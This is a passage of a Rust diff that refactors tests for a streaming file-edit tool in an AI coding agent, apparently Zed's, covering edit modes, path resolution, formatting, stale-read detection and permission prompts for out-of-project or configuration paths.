_fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = 
cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial then drop the sender without sending final sender.send_partial(json!({ @@ -2753,41 +2169,14 @@ mod tests { #[gpui::test] async fn test_streaming_input_recv_drains_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; // Create a channel and send multiple partials before a final, then use // ToolInput::resolved-style immediate delivery to confirm recv() works // when partials are already buffered. 
- let (sender, input): (ToolInputSender, ToolInput) = + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Buffer several partials before sending the final sender.send_partial(json!({"display_description": "Create"})); @@ -2795,12 +2184,12 @@ mod tests { sender.send_partial(json!({ "display_description": "Create", "path": "root/dir/new.txt", - "mode": "create" + "mode": "write" })); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create", "path": "root/dir/new.txt", - "mode": "create", + "mode": "write", "content": "streamed content" })); @@ -2813,7 +2202,7 @@ mod tests { #[gpui::test] async fn test_streaming_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = StreamingEditFileMode::Create; + let mode = StreamingEditFileMode::Write; let result = test_resolve_path(&mode, "root/new.txt", cx); assert_resolved_path_eq(result.await, rel_path("new.txt")); @@ -2825,14 +2214,17 @@ mod tests { assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); let result = test_resolve_path(&mode, "root/dir/subdir/existing.txt", cx); + assert_resolved_path_eq(result.await, rel_path("dir/subdir/existing.txt")); + + let result = test_resolve_path(&mode, "root/dir/subdir", cx); assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: file already exists" + result.await.unwrap_err(), + "Can't write to file: path is a directory" ); let result = test_resolve_path(&mode, "root/dir/nonexistent_dir/new.txt", cx); assert_eq!( - result.await.unwrap_err().to_string(), + result.await.unwrap_err(), "Can't create file: parent directory doesn't exist" ); } @@ -2850,14 +2242,11 @@ mod tests { 
assert_resolved_path_eq(result.await, rel_path(path_without_root)); let result = test_resolve_path(&mode, "root/nonexistent.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't edit file: path not found" - ); + assert_eq!(result.await.unwrap_err(), "Can't edit file: path not found"); let result = test_resolve_path(&mode, "root/dir", cx); assert_eq!( - result.await.unwrap_err().to_string(), + result.await.unwrap_err(), "Can't edit file: path is a directory" ); } @@ -2866,7 +2255,7 @@ mod tests { mode: &StreamingEditFileMode, path: &str, cx: &mut TestAppContext, - ) -> anyhow::Result { + ) -> Result { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -2883,11 +2272,11 @@ mod tests { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.update(|cx| resolve_path(mode.clone(), &PathBuf::from(path), &project, cx)) + cx.update(|cx| resolve_path(*mode, &PathBuf::from(path), &project, cx)) } #[track_caller] - fn assert_resolved_path_eq(path: anyhow::Result, expected: &RelPath) { + fn assert_resolved_path_eq(path: Result, expected: &RelPath) { let actual = path.expect("Should return valid path").path; assert_eq!(actual.as_ref(), expected); } @@ -2898,8 +2287,8 @@ mod tests { let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let rust_language = Arc::new(language::Language::new( language::LanguageConfig { @@ -2948,9 +2337,10 @@ mod tests { project.register_buffer_with_language_servers(&buffer, cx) }); - const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\n"; - const FORMATTED_CONTENT: &str = - "This file was formatted by the fake formatter in the test.\n"; + const UNFORMATTED_CONTENT: &str = "fn main() {println!(\"Hello!\");}\ +"; + const 
FORMATTED_CONTENT: &str = "This file was formatted by the fake formatter in the test.\ +"; // Get the fake language server and set up formatting handler let fake_language_server = fake_language_servers.next().await.unwrap(); @@ -2963,20 +2353,6 @@ mod tests { } }); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - // Test with format_on_save enabled cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { @@ -2989,28 +2365,22 @@ mod tests { }); // Use streaming pattern so executor can pump the LSP request/response - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry.clone(), - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ "display_description": "Create main function", "path": "root/src/main.rs", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create main function", "path": "root/src/main.rs", - "mode": "overwrite", + "mode": "write", "content": UNFORMATTED_CONTENT })); @@ -3046,28 +2416,29 @@ mod tests { }); }); - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( + let tool2 = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), + 
action_log.clone(), language_registry, )); - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool2.run(input, event_stream, cx)); sender.send_partial(json!({ "display_description": "Update main function", "path": "root/src/main.rs", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Update main function", "path": "root/src/main.rs", - "mode": "overwrite", + "mode": "write", "content": UNFORMATTED_CONTENT })); @@ -3090,7 +2461,6 @@ mod tests { let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/root", json!({"src": {}})).await; - fs.save( path!("/root/src/main.rs").as_ref(), &"initial content".into(), @@ -3098,22 +2468,9 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Test with remove_trailing_whitespace_on_save enabled cx.update(|cx| { @@ -3133,20 +2490,14 @@ mod tests { let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - 
project.clone(), - thread.downgrade(), - language_registry.clone(), - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create main function".into(), + path: "root/src/main.rs".into(), + mode: StreamingEditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -3178,22 +2529,23 @@ mod tests { }); }); + let tool2 = Arc::new(StreamingEditFileTool::new( + project.clone(), + thread.downgrade(), + action_log.clone(), + language_registry, + )); + let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool2.run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Update main function".into(), + path: "root/src/main.rs".into(), + mode: StreamingEditFileMode::Write, + content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -3213,29 +2565,7 @@ mod tests { #[gpui::test] async fn test_streaming_authorize(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - 
context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - fs.insert_tree("/root", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3269,7 +2599,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3316,7 +2646,7 @@ mod tests { cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -3330,7 +2660,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt cx.update(|cx| { @@ -3356,27 +2686,8 @@ mod tests { fs.insert_tree("/outside", json!({})).await; fs.insert_symlink("/root/link", PathBuf::from("/outside")) .await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = 
Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -3407,7 +2718,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } @@ -3439,29 +2753,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _authorize_task = cx.update(|cx| { @@ -3506,29 +2799,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let 
thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { @@ -3583,29 +2855,8 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let result = cx @@ -3622,8 +2873,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - stream_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + stream_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -3634,26 +2885,8 @@ mod tests { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/project", json!({})).await; - let project = Project::test(fs.clone(), 
[path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; let test_cases = vec![ ( @@ -3683,7 +2916,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3696,7 +2929,6 @@ mod tests { async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( "/workspace/frontend", json!({ @@ -3724,36 +2956,16 @@ mod tests { }), ) .await; - - let project = Project::test( - fs.clone(), - [ + let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( + cx, + fs, + &[ path!("/workspace/frontend").as_ref(), path!("/workspace/backend").as_ref(), path!("/workspace/shared").as_ref(), ], - cx, ) .await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - 
Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); let test_cases = vec![ ("frontend/src/main.js", false, "File in first worktree"), @@ -3781,7 +2993,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3808,26 +3020,8 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; let test_cases = vec![ ("", false, "Empty path is treated as project root"), @@ -3859,7 +3053,7 @@ mod tests { stream_rx.expect_authorization().await; } else { assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -3883,32 +3077,10 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = 
Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - let modes = vec![ - StreamingEditFileMode::Edit, - StreamingEditFileMode::Create, - StreamingEditFileMode::Overwrite, - ]; + let modes = vec![StreamingEditFileMode::Edit, StreamingEditFileMode::Write]; for _mode in modes { // Test .zed path with different modes @@ -3949,7 +3121,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); } } @@ -3957,26 +3129,9 @@ mod tests { async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )); + fs.insert_tree("/project", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; cx.update(|cx| { assert_eq!( @@ -4031,37 +3186,19 @@ mod tests { init_test(cx); let fs = 
project::FakeFs::new(cx.executor()); fs.insert_tree("/", json!({"main.rs": ""})).await; - - let project = Project::test(fs.clone(), [path!("/").as_ref()], cx).await; - let languages = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, _fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Ensure the diff is finalized after the edit completes. { - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { - tool.run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Overwrite, + mode: StreamingEditFileMode::Write, content: Some("new content".into()), edits: None, }), @@ -4082,7 +3219,8 @@ mod tests { let tool = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), - languages.clone(), + action_log, + language_registry, )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { @@ -4090,7 +3228,7 @@ mod tests { ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Overwrite, + mode: StreamingEditFileMode::Write, content: Some("dropped content".into()), edits: None, }), @@ -4109,42 +3247,12 @@ mod tests { #[gpui::test] async fn 
test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4165,13 +3273,13 @@ mod tests { // First edit should work let edit_result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "First edit".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "original content".into(), new_text: "modified content".into(), }]), @@ -4190,13 +3298,13 @@ mod tests { // Second edit should also work because the edit updated the recorded read time let edit_result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Second edit".into(), path: 
"root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "modified content".into(), new_text: "further modified content".into(), }]), @@ -4215,42 +3323,12 @@ mod tests { #[gpui::test] async fn test_streaming_external_modification_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4299,13 +3377,13 @@ mod tests { // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "externally modified content".into(), 
new_text: "new content".into(), }]), @@ -4316,54 +3394,32 @@ mod tests { }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; + assert!( error.contains("has been modified since you last read it"), "Error should mention file modification, got: {}", error ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); } #[gpui::test] async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), project.clone(), - action_log, - )); - let edit_tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - languages, + action_log.clone(), + true, )); // Read the file first @@ -4403,13 +3459,13 @@ mod tests { // Try to edit - should fail because buffer has unsaved changes let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(StreamingEditFileToolInput { display_description: 
"Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: StreamingEditFileMode::Edit, content: None, - edits: Some(vec![EditOperation { + edits: Some(vec![Edit { old_text: "original content".into(), new_text: "new content".into(), }]), @@ -4420,7 +3476,12 @@ mod tests { }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; assert!( @@ -4438,51 +3499,21 @@ mod tests { "Error should ask user to manually save or revert when tools aren't available, got: {}", error ); + assert!(diff.is_empty()); + assert!(input_path.is_none()); } #[gpui::test] - async fn test_streaming_overlapping_edits_detected_early(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - // The file content is crafted so that edit 1's replacement still - // contains the old_text of edit 2 as a contiguous substring. - // Without early overlap detection, edit 2 would silently match - // inside the already-modified region and corrupt the file instead - // of producing a clear "Conflicting edit ranges" error. 
- fs.insert_tree( - "/root", - json!({ - "file.txt": "aaa\nbbb\nccc\nddd\neee\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { + // Edit 1's replacement introduces text that contains edit 2's + // old_text as a substring. Because edits resolve sequentially + // against the current buffer, edit 2 finds a unique match in + // the modified buffer and succeeds. + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, 